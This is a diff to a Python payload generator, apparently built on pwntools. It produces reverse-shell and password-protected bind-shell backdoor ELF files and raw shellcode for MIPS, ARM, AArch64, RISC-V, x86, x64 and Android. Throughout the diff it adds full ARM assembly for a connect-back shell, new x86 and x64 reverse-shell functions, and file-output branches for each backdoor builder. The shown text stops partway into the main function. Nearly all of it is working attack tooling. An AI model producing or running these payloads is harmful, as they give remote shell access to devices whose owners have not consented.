@@ -1,6 +1,9 @@
 from . import extract_shellcode
 from pwn import *
 import argparse
+from . import model_choise
+from . import cve_info
+import os
 
 def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 	context.arch='mips'
@@ -40,6 +43,16 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(ELF_data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 def aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 	context.arch='aarch64'
@@ -77,6 +90,16 @@ def aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 def aarch64_reverse_sl(reverse_ip,reverse_port):
 	context.arch='aarch64'
@@ -206,6 +229,16 @@ def armelv7_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 def armelv7_reverse_sl(reverse_ip,reverse_port):
 	context.arch='arm'
@@ -428,6 +461,16 @@ def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 def armelv5_reverse_sl(reverse_ip,reverse_port):
 	context.bits="32"
@@ -504,7 +547,7 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 	log.success("reverse_ip is set to "+ reverse_ip)
 	log.success("reverse_port is set to "+ str(reverse_port))
 	handle_ip=reverse_ip.split('.')
-	handle_port=list(str(reverse_port)[::-1])
+	handle_port=list(p16(reverse_port)[::-1])
 	for i in range(len(handle_ip)):
 		if handle_ip[i]!="0":
 			handle_ip[i]="mov r7,#"+handle_ip[i]
@@ -650,7 +693,7 @@ def armebv7_reverse_sl(reverse_ip,reverse_port):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
-		#return shellcode
+		return shellcode
 	else:
 		#log.info("waiting 3s")
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
@@ -676,12 +719,12 @@ def armebv5_reverse_sl(reverse_ip,reverse_port):
 	%s
 	strb r7,[sp,#-0x25]
 	mov r7,#2
-	strb r7,[sp,#-0x29]
-	strb r4,[sp,#-0x2a]
-	%s
 	strb r7,[sp,#-0x2b]
+	strb r4,[sp,#-0x2c]
 	%s
-	strb r7,[sp,#-0x2c]
+	strb r7,[sp,#-0x2a]
+	%s
+	strb r7,[sp,#-0x29]
 	strb r4,[sp,#-0x14]
 	mov r7,#0x68
 	strb r7,[sp,#-0x15]
@@ -734,9 +777,9 @@ def armebv5_reverse_sl(reverse_ip,reverse_port):
 	'''
 	log.success("reverse_ip is set to "+ reverse_ip)
 	log.success("reverse_port is set to "+ str(reverse_port))
-
 	handle_ip=reverse_ip.split('.')[::-1]
-	handle_port=list(str(reverse_port))
+	handle_port=list(p16(reverse_port)[::-1])
+	print(handle_port)
 	for i in range(len(handle_ip)):
 		if handle_ip[i]!="0":
 			handle_ip[i]="mov r7,#"+handle_ip[i]
@@ -748,7 +791,7 @@ def armebv5_reverse_sl(reverse_ip,reverse_port):
 		else:
 			handle_port[i]="eor r7,r7,r7"
 
-	shellcode=shellcode%(handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3],handle_port[0],handle_port[1])
+	shellcode=shellcode%(handle_ip[3],handle_ip[2],handle_ip[1],handle_ip[0],handle_port[1],handle_port[0])
 	#print shellcode
 	#str(u8(handle_port[0])),str(u8(handle_port[1])
 	#handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3]
@@ -798,9 +841,9 @@ def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
 	shellcode3=asm(shellcraft.sh())
 	all_reverseshell=basic_shellcode+shellcode2+shellcode3
 	data=make_elf(all_reverseshell)
-	log.info("waiting 3s")
-	sleep(1)
 	if filename==None:
+		log.info("waiting 3s")
+		sleep(1)
 		filename="backdoor_armv7"
 		f=open(filename,"wb")
 		f.write(data)
@@ -810,36 +853,132 @@ def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
-'''
 def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
 	context.bits="32"
 	context.arch='arm'
 	context.endian='big'
-	reverse_port=p16(reverse_port)[::-1]
-	reverse_ip=reverse_ip.split(".")
-	reverse_ip_new=b''
-	for i in range(4):
-		reverse_ip_new+=p8(int(reverse_ip[i]))
-	shellcode  = b'\x01\x30\x8F\xE2\x13\xFF\x2F\xE1\x02\x20\x01\x21\x52\x40\x64\x27'
-	shellcode += b'\xB5\x37\x01\xDF\x04\x1C\x0D\xA1\x4A\x70\x10\x22\x02\x37\x01\xDF'
-	shellcode += b'\x20\x1C\x49\x40\x3F\x27\x01\xDF\x20\x1C\x01\x31\x01\xDF\x20\x1C'
-	shellcode += b'\x01\x31\x01\xDF\x03\xA0\x52\x40\xC2\x71\x05\xB4\x69\x46\x0B\x27'
-	shellcode += b'\x01\xDF\x7F\x40\x2F\x62\x69\x6E\x2F\x73\x68\x41\x02\xAA'
-	shellcode += reverse_port
-	shellcode += reverse_ip_new
+	shellcode='''
+	.ARM
+	eor r4,r4,r4
+	%s
+	strb r7,[sp,#-0x28]
+	%s
+	strb r7,[sp,#-0x27]
+	%s
+	strb r7,[sp,#-0x26]
+	%s
+	strb r7,[sp,#-0x25]
+	mov r7,#2
+	strb r7,[sp,#-0x2b]
+	strb r4,[sp,#-0x2c]
+	%s
+	strb r7,[sp,#-0x2a]
+	%s
+	strb r7,[sp,#-0x29]
+	strb r4,[sp,#-0x14]
+	mov r7,#0x68
+	strb r7,[sp,#-0x15]
+	mov r7,#0x73
+	strb r7,[sp,#-0x16]
+	mov r7,#0x2f
+	strb r7,[sp,#-0x17]
+	mov r7,#0x6e
+	strb r7,[sp,#-0x18]
+	mov r7,#0x69
+	strb r7,[sp,#-0x19]
+	mov r7,#0x62
+	strb r7,[sp,#-0x1a]
+	mov r7,#0x2f
+	strb r7,[sp,#-0x1b]
+	add r4,sp,#-0x1b
+	add r5,sp,#-0x2c
+	add r3,pc,#1
+	bx  r3
+	.THUMB
+	mov r1,#2
+	mov r0,r1
+	mov r1,#1
+	eor r2,r2,r2
+	mov r7,#200
+	add r7,r7,#81
+	svc #1
+	mov r6,r0
+	mov r1,r5
+	mov r2,#0x10
+	add r7,r7,#2
+	svc #1
+	mov r0,r6
+	eor r1,r1,r1
+	mov r7,#63
+	svc #1
+	mov r0,r6
+	add r1,r1,#1
+	svc #1
+	mov r0,r6
+	add r1,r1,#1
+	svc #1
+	mov r0,r4
+	eor r1,r1,r1
+	eor r2,r2,r2
+	push {r0,r1}
+	mov r1,sp
+	mov r7,#0xb
+	svc #1
+	'''
+	log.success("reverse_ip is set to "+ reverse_ip)
+	log.success("reverse_port is set to "+str(reverse_port))
+	handle_ip=reverse_ip.split('.')
+	handle_port=list(p16(reverse_port)[::-1])
+	for i in range(len(handle_ip)):
+		if handle_ip[i]!="0":
+			handle_ip[i]="mov r7,#"+handle_ip[i]
+		else:
+			handle_ip[i]="eor r7,r7,r7"
+	for i in range(len(handle_port)):
+		if handle_port[i]!="\x00":
+			handle_port[i]="mov r7,#"+str(handle_port[i])
+		else:
+			handle_port[i]="eor r7,r7,r7"
+
+	shellcode=shellcode%(handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3],handle_port[1],handle_port[0])
+	#print shellcode
+	#str(u8(handle_port[0])),str(u8(handle_port[1])
+	#handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3]
+	shellcode=asm(shellcode)[:-2]
 	data = make_elf(shellcode)
 	if filename==None:
 		filename="backdoor_armebv5"
 		f=open(filename,"wb")
 		f.write(data)
 		f.close()
+		log.info("waiting 3s")
+		sleep(1)
 		#print disasm(all_reverseshell)
-		print("backdoor_armebv5 is ok in current path ./")
+		log.success("backdoor_armebv5 is ok in current path ./")
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
-'''
 
 def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 	context.arch='mips'
@@ -868,9 +1007,9 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 	shellcode_execve=asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
 	ELF_data_shellcode=shellcode_connect+shellcode_dump_sh+shellcode_execve
 	ELF_data=make_elf(ELF_data_shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if filename==None:
+		log.info("waiting 3s")
+		sleep(1)
 		filename="mipsel_backdoor"
 		f=open(filename,"wb")
 		f.write(ELF_data)
@@ -904,9 +1043,9 @@ def mips_backdoor(reverse_ip,reverse_port,filename=None):
 	shellcode_execve=asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
 	ELF_data_shellcode=shellcode_connect+shellcode_dump_sh+shellcode_execve
 	ELF_data=make_elf(ELF_data_shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if filename==None:
+		log.info("waiting 3s")
+		sleep(1)
 		filename="mips_backdoor"
 		f=open(filename,"wb")
 		f.write(ELF_data)
@@ -915,6 +1054,16 @@ def mips_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(ELF_data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 
 def mipsel_reverse_sl(reverse_ip,reverse_port):
@@ -1113,11 +1262,11 @@ def mips64el_backdoor(reverse_ip,reverse_port,filename=None):
 	syscall 0x40404
 
 	'''
-	log.info("waiting 3s")
-	sleep(1)
 	shellcode=asm(shellcode_connect)+asm(shellcode_dup_sh)+asm(shellcode_execve)
 	shellcode=make_elf(shellcode)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./mips64el_backdoor","wb")
 		f.write(shellcode)
 		f.close()
@@ -1125,6 +1274,16 @@ def mips64el_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(shellcode)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 
 def mips64_backdoor(reverse_ip,reverse_port,filename=None):
@@ -1219,9 +1378,9 @@ def mips64_backdoor(reverse_ip,reverse_port,filename=None):
 	'''
 	shellcode = asm(shellcode_connect) + asm(shellcode_dup_sh) + asm(shellcode_execve)
 	shellcode = make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if (filename == None):
+		log.info("waiting 3s")
+		sleep(1)
 		f = open("./mips64_backdoor", "wb")
 		f.write(shellcode)
 		f.close()
@@ -1229,6 +1388,16 @@ def mips64_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(shellcode)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 def mips64el_reverse_sl(reverse_ip,reverse_port):
 	log.success("reverse_ip is: "+ reverse_ip)
@@ -1343,6 +1512,7 @@ def mips64el_reverse_sl(reverse_ip,reverse_port):
 		context.endian = "little"
 		return data_shellcode
 
+
 def mips64_reverse_sl(reverse_ip,reverse_port):
 	context.arch = 'mips64'
 	context.bits = "64"
@@ -1516,9 +1686,9 @@ def riscv64el_backdoor(reverse_ip,reverse_port,filename=None):
 	shellcode_execve=asm(shellcode_execve)
 	shellcode = shellcode_connect+shellcode_dup_sh+shellcode_execve
 	shellcode=make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./riscv64el_backdoor","wb")
 		f.write(shellcode)
 		f.close()
@@ -1526,6 +1696,16 @@ def riscv64el_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(shellcode)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 def android_aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 	context.arch='aarch64'
@@ -1552,9 +1732,9 @@ def android_aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 	all_reverseshell=basic_shellcode+shellcode2+shellcode3
 	#all_reverseshell=shellcode3
 	data=make_elf(all_reverseshell)
-	log.info("waiting 3s")
-	sleep(1)
 	if filename==None:
+		log.info("waiting 3s")
+		sleep(1)
 		filename="backdoor_Android_aarch64"
 		f=open(filename,"wb")
 		f.write(data)
@@ -1564,6 +1744,16 @@ def android_aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 
 '''
@@ -1669,17 +1859,26 @@ def x64_bind_shell(listen_port, passwd, filename=None):
 	'''
 	shellcode = asm(shellcode%(listen_port, passwd_len, passwd))
 	data=make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./x64_bind_shell","wb")
 		f.write(data)
 		f.close()
 		log.success("x64_bind_shell is ok in current path ./")
-	context.arch = 'i386'
-	context.bits = "32"
-	context.endian = "little"
-
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 
 '''
@@ -1785,16 +1984,26 @@ def x86_bind_shell(listen_port, passwd, filename=None):
 	'''
 	shellcode = asm(shellcode%(listen_port, passwd_len, passwd))
 	data = make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./x86_bind_shell","wb")
 		f.write(data)
 		f.close()
 		log.success("x86_bind_shell is ok in current path ./")
-	context.arch = 'i386'
-	context.bits = "32"
-	context.endian = "little"
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 
 '''
@@ -1875,16 +2084,26 @@ def armelv7_bind_shell(listen_port, passwd, filename=None):
 	shellcode += asm(shellcode_dump) + b"\xF9\xFF\xFF\xaa"
 	shellcode += asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
 	data = make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./armelv7_bind_shell","wb")
 		f.write(data)
 		f.close()
 		log.success("armelv7_bind_shell is ok in current path ./")
-	context.arch = 'i386'
-	context.bits = "32"
-	context.endian = "little"
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 '''
 Armv7eb bindshell backdoor file
@@ -1962,16 +2181,27 @@ def armv7eb_bind_shell(listen_port, passwd, filename = None):
 	shellcode += asm(shellcode_dump) + b"\xF9\xFF\xFF\xaa"[::-1]
 	shellcode += asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
 	data = make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./armelv7_bind_shell","wb")
 		f.write(data)
 		f.close()
 		log.success("armebv7_bind_shell is ok in current path ./")
-	context.arch = 'i386'
-	context.bits = "32"
-	context.endian = "little"
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
+
 
 
 '''
@@ -1989,9 +2219,9 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 	shellcode += shellcraft.sh()
 	shellcode = asm(shellcode)
 	data = make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./x64el_backdoor","wb")
 		f.write(data)
 		f.close()
@@ -1999,6 +2229,16 @@ def x64el_backdoor(reverse_ip, reverse_port, filename=None):
 		context.arch = 'i386'
 		context.bits = "32"
 		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 '''
 x86 x86el_backdoor
@@ -2015,13 +2255,24 @@ def x86el_backdoor(reverse_ip, reverse_port, filename =None):
 	shellcode += shellcraft.sh()
 	shellcode = asm(shellcode)
 	data = make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./x86el_backdoor","wb")
 		f.write(data)
 		f.close()
 		log.success("x86el_backdoor is ok in current path ./")
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
+
 
 
 
@@ -2102,16 +2353,26 @@ def mipsel_bind_shell(listen_port, passwd,filename = None):
 	shellcode += asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
 	#shellcode = asm(shellcode)
 	data = make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./mipsel_bind_shell","wb")
 		f.write(data)
 		f.close()
 		log.success("mipsel_bind_shell is ok in current path ./")
-	context.arch = 'i386'
-	context.bits = "32"
-	context.endian = "little"
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 '''
 mips bindshell
@@ -2126,7 +2387,7 @@ def mips_bind_shell(listen_port, passwd, filename=None ):
 	log.success("passwd is set to '%s'"%passwd )
 	listen_port = '0x'+enhex(p16(listen_port))
 	passwd_len = hex(len(passwd))
-	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(8,"0")
+	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).ljust(8,"0")
 	#passwd_high = passwd[:6]
 	#passwd_low  = "0x"+passwd[6:10]
 	shellcode = shellcraft.socket(2,2,0)
@@ -2189,16 +2450,27 @@ def mips_bind_shell(listen_port, passwd, filename=None ):
 	shellcode += asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
 	#shellcode = asm(shellcode)
 	data = make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
+
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./mips_bind_shell","wb")
 		f.write(data)
 		f.close()
 		log.success("mips_bind_shell is ok in current path ./")
-	context.arch = 'i386'
-	context.bits = "32"
-	context.endian = "little"
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 '''
 aarch64 aarch64_bind_shell
@@ -2291,16 +2563,26 @@ def aarch64_bind_shell(listen_port, passwd, filename = None):
 	shellcode += shellcraft.execve("/bin/sh",['/bin/sh'],0)
 	shellcode = asm(shellcode % (listen_port, passwd_len, passwd_low2, passwd_low, passwd_high2, passwd_high))
 	data=make_elf(shellcode)
-	log.info("waiting 3s")
-	sleep(1)
 	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
 		f=open("./aarch64_bind_shell","wb")
 		f.write(data)
 		f.close()
 		log.success("aarch64_bind_shell is ok in current path ./")
-	context.arch = 'i386'
-	context.bits = "32"
-	context.endian = "little"
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
 
 
 
@@ -2316,6 +2598,142 @@ def Introduction():
 	'''
 	print(example_reverse)
 
+
+def x86el_backdoor(reverse_ip, reverse_port, filename=None):
+	context.arch = 'i386'
+	context.endian = 'little'
+	context.bits = '32'
+	log.success("reverse_ip is: "+ reverse_ip)
+	log.success("reverse_port is: "+str(reverse_port))
+	shellcode = shellcraft.connect(reverse_ip, reverse_port)
+	shellcode += shellcraft.dup2("edx",0)+shellcraft.dup2("edx",1)+shellcraft.dup2("edx",2)
+	shellcode += shellcraft.sh()
+	shellcode = asm(shellcode)
+	data = make_elf(shellcode)
+	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
+		f=open("./x86el_backdoor","wb")
+		f.write(data)
+		f.close()
+		log.success("x86el_backdoor is ok in current path ./")
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
+
+def x64el_backdoor(reverse_ip, reverse_port, filename=None):
+	context.arch = 'amd64'
+	context.endian = 'little'
+	context.bits = '64'
+	log.success("reverse_ip is: "+ reverse_ip)
+	log.success("reverse_port is: "+str(reverse_port))
+	shellcode = shellcraft.connect(reverse_ip, reverse_port)
+	shellcode += shellcraft.dup2("rbp",0)+shellcraft.dup2("rbp",1)+shellcraft.dup2("rbp",2)
+	shellcode += shellcraft.sh()
+	shellcode = asm(shellcode)
+	data = make_elf(shellcode)
+	if(filename==None):
+		log.info("waiting 3s")
+		sleep(1)
+		f=open("./x64el_backdoor","wb")
+		f.write(data)
+		f.close()
+		log.success("x64el_backdoor is ok in current path ./")
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+	else:
+		log.info("waiting 3s")
+		sleep(1)
+		f=open(filename,"wb")
+		f.write(data)
+		f.close()
+		log.success("{} is ok in current path ./".format(filename))
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
+
+
+def x64el_reverse_sl(reverse_ip, reverse_port):
+	context.arch ='amd64'
+	context.endian = 'little'
+	context.bits = '64'
+	log.success("reverse_ip is: "+ reverse_ip)
+	log.success("reverse_port is: "+str(reverse_port))
+	shellcode = shellcraft.connect(reverse_ip,reverse_port)
+	shellcode += shellcraft.dup2("rbp",0)+ shellcraft.dup2("rbp",1)+shellcraft.dup2("rbp",2)
+	shellcode += shellcraft.execve("/bin/sh",["/bin/sh"],0)
+	shellcode = asm(shellcode)
+	shellcode_len = len(shellcode)
+	shellcode_hex = ''
+	shellcode_hex = extract_shellcode.extract_sl_print(shellcode, shellcode_hex)
+	if "\\x00" in shellcode_hex:
+		#log.info("waiting 3s")
+		#sleep(1)
+		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
+		log.info("the null byte in {}".format(shellcode.index(b"\x00")))
+		print(shellcode_hex)
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+		return shellcode
+	else:
+		#log.info("waiting 3s")
+		#sleep(1)
+		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
+		print(shellcode_hex)
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+		return shellcode
+
+def x86el_reverse_sl(reverse_ip, reverse_port):
+	context.arch = 'i386'
+	context.endian = 'little'
+	context.bits = '32'
+	log.success("reverse_ip is: "+ reverse_ip)
+	log.success("reverse_port is: "+str(reverse_port))
+	shellcode = shellcraft.connect(reverse_ip, reverse_port)
+	shellcode += shellcraft.dup2("edx",0) + shellcraft.dup2("edx",1) + shellcraft.dup2("edx",2)
+	shellcode += shellcraft.execve("/bin/sh",["/bin/sh"],0)
+	shellcode = asm(shellcode)
+	shellcode_len = len(shellcode)
+	shellcode_hex = ''
+	shellcode_hex = extract_shellcode.extract_sl_print(shellcode, shellcode_hex)
+	if "\\x00" in shellcode_hex:
+		#log.info("waiting 3s")
+		#sleep(1)
+		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
+		log.info("the null byte in {}".format(shellcode.index(b"\x00")))
+		print(shellcode_hex)
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+		return shellcode
+	else:
+		#log.info("waiting 3s")
+		#sleep(1)
+		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
+		print(shellcode_hex)
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+		return shellcode
+
+def version():
+    return "version:"+__version__
+
+
 reverse_backdoor_dic = {
     1: mips_backdoor,
     2: mipsel_backdoor,
@@ -2323,11 +2741,11 @@ reverse_backdoor_dic = {
     4: mips64el_backdoor,
     5: armelv5_backdoor,
     6: armelv7_backdoor,
-    7: None,
+    7: armebv5_backdoor,
     8: armebv7_backdoor,
     9: aarch64_backdoor,
-    10: None,
-    11: None,
+    10: x86el_backdoor,
+    11: x64el_backdoor,
     12: android_aarch64_backdoor
 }
 
@@ -2341,8 +2759,8 @@ reverse_shellcode_dic = {
 	7: armebv5_reverse_sl,
 	8: armebv7_reverse_sl,
 	9: aarch64_reverse_sl,
-	10: None,
-	11: None,
+	10: x86el_reverse_sl,
+	11: x64el_reverse_sl,
 	12: None
 }
 
@@ -2374,7 +2792,8 @@ arch_2_num_dic ={
 	'aarch64': 9,
 	'x86': 10,
 	'x64': 11,
-	'android': 12
+	'android': 12,
+	'powerpc': 13
 
 }
 
@@ -2384,50 +2803,121 @@ def arch_get_number(input_arch):
 	fun = arch_2_num_dic.get(input_arch)
 	return fun
 
-def num_getreverse_file(number, reverse_ip, reverse_port):
+def num_getreverse_file(number, reverse_ip, reverse_port, filename):
 
     fun = reverse_backdoor_dic.get(number)
-    return fun(reverse_ip, reverse_port)
+    return fun(reverse_ip, reverse_port, filename)
 
 def num_getreverse_shellcode(number, reverse_ip, reverse_port):
 
 	fun = reverse_shellcode_dic.get(number)
 	return fun(reverse_ip, reverse_port)
 
-def num_getbind_shell(number, listen_port, passwd):
+def num_getbind_shell(number, listen_port, passwd, filename):
 
 	fun = bind_shell_dic.get(number)
-	return fun(listen_port, passwd)
+	return fun(listen_port, passwd, filename)
 
 def main():
-	parser = argparse.ArgumentParser()
-	parser.add_argument('-reverse_ip', required=True, type=str, default=None, help='reverse_ip set')
-	parser.add_argument('-reverse_port', required=True, type=int, help='reverse_port set')
-	parser.add_argument('-arch', required=True, type=str, help='Target arch architecturet', choices=('mips','mipsel','mips64','mipsel64','armelv5','armelv7','armebv5','armebv7','aarch64','x86','x64','aarch64','android'))
-	parser.add_argument('-res', required=True, type=str,default="reverse_shell_file", choices=('reverse_shell_file', 'reverse_shellcode', 'bind_shell'))
-	parser.add_argument('-passwd', required=False, type=str,default=None)
-	args = parser.parse_args()
-	if (args.res == "reverse_shell_file"):
-		try:
-			num_getreverse_file(arch_get_number(args.arch), args.reverse_ip, args.reverse_port)
-		except Exception as e:
-		#	print(e)
-			log.info("The function is still under development. Please wait")
+	example = '''
+example
+	Generate reverse_shell_file Corresponding architecture:
